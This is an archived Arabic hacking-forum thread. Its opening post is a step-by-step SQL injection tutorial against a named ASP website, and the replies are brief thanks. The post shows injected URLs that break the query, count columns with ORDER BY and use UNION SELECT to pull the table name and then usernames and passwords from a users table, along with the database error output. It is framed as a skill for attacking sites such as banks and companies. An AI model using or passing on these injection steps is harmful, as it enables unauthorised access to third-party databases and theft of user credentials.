:: vBspiders Professional Network ::
صفحة 1 من 2 1 2
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   شرح مبسط : استغلال ثغرات Asp باحتراف .. (http://www.vbspiders.com/vb/t31984.html)

KaLa$nikoV 07-08-2010 09:29 PM
شرح مبسط : استغلال ثغرات Asp باحتراف ..
 
السلام عليكم ورحمة الله وبركاته

اليوم وبعد انقطاع عن المواضيع .. قررت اعمل لكم شرح عن استغلال ثغرات asp ..
 هذه البرمجة نادرة الاستخدام الا فى المواقع الكبيرة مثل البنوك والشركات ..

 ساشرح لكم كيفية استغلال خطأ sql تابع معى ..

 انا ساشرج لكم على موقع www.haybersqlogretiyo.com

 المنطقة المصابة بثغرة sql نضع بعد الرابط وبعد المتغير علامة " او '
www.haybersqlogretiyo.com/baskabibolum.asp?id=10"


 يظهر لنا الخطأ التالى :

كود PHP:
 Microsoft JET Database Engine error ’80040e14’  
Syntax error in string in query expression ’id 10";’.  
/baskabirbolum.asp, line 7 
لان نبدا نعد بالاعمدة للوصول الى العمود المطلوب
http://www.haybersqlogretiyo.com/bas...=10+order+by+1

 الان عند الوصول الى العمود المصاب وهو 10
 http://www.haybersqlogretiyo.com/bas...10+order+by+10
يظهر الخطأ التالى :

كود PHP:
 Microsoft JET Database Engine error ’80040e14’  
The Microsoft Jet database engine does not recognize ’10’ as a valid field name or expression.  
/news.aspline 7 
ويكون العمود المصاب الرقم 8
 http://www.haybersqlogretiyo.com/bas...=10+order+by+8

 http://i41.tinypic.com/20za0ys.jpg

 http://www.haybersqlogretiyo.com/bas...+0,1,2,3,4,5,6, 7--

 الان عند الوصول الى الرقم 7 يظهر لنا هذا الخطا وبداخله اسم القاعدة

كود PHP:
   Microsoft JET Database Engine error ’80040e37’  
The Microsoft Jet database engine cannot find the input table or query ’hayber’Make sure it exists and that its name is spelled correctly.  
/baskabirbolum.aspline 7 
واسمها : hayber

ويتم استغلالها .
http://www.haybersqlogretiyo.com/bas...+0,1,2,3,4,5,6, 7+from+hayber

والان نظهر اسم اليوزر والباس
http://www.haybersqlogretiyo.com/bas...0,username,pas sword,3,4,5,6,7+from+users
http://i44.tinypic.com/n18npf.jpg


تحياتي

اقتباس:

منقول عن قراصنه نابلس
Mr.X

Zero 07-08-2010 09:34 PM
[align=center][align=center]احسن نقلة ياعم فولكانو مشكووور [/align][/align]

NeTCaT-Ma 07-08-2010 09:57 PM
مشكوووور يامعلم بارك الله فيك

z3r0 b0mb3r 07-08-2010 11:16 PM
شكرا لك يائخي الي الامام

TheGame 07-09-2010 04:33 AM
مشكور فولوكانو بارك الله بيك بس ياريت لو تعملنه شرح فيديو وبارك الله فيك

KALASH3R 08-10-2010 04:03 PM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

NickelbackII 09-06-2011 02:41 PM
رد: شرح مبسط : استغلال ثغرات Asp باحتراف ..
 
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

bilalo100 09-06-2011 04:05 PM
رد: شرح مبسط : استغلال ثغرات Asp باحتراف ..
 
مشكور فولوكانو بارك الله بيك

hacker2020 09-08-2011 12:04 PM
رد: شرح مبسط : استغلال ثغرات Asp باحتراف ..
 
شكرأ

دام علاء العماد 09-17-2011 06:58 AM
رد: شرح مبسط : استغلال ثغرات Asp باحتراف ..
 
بارك الله فيك يا أخي الكريم ، و جزاك الله عنا خير الجزاء

wolio 10-21-2013 05:16 AM
رد: شرح مبسط : استغلال ثغرات Asp باحتراف ..
 
مشكوووووووووووووووووووووووووووووووور

islambou 12-09-2013 12:57 AM
رد: شرح مبسط : استغلال ثغرات Asp باحتراف ..
 
مشكور بارك الله فيك

الديلر الفلسطيني 01-04-2014 05:34 PM
رد: شرح مبسط : استغلال ثغرات Asp باحتراف ..
 
واصل :)

Wawi alBasrah 12-11-2014 01:50 PM
رد: شرح مبسط : استغلال ثغرات Asp باحتراف ..
 
احسنت اخي جهد رائع :smile:

wwwamriki 12-12-2014 02:58 PM
رد: شرح مبسط : استغلال ثغرات Asp باحتراف ..
 
تسلم ايديك


الساعة الآن 08:38 PM
صفحة 1 من 2 1 2
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0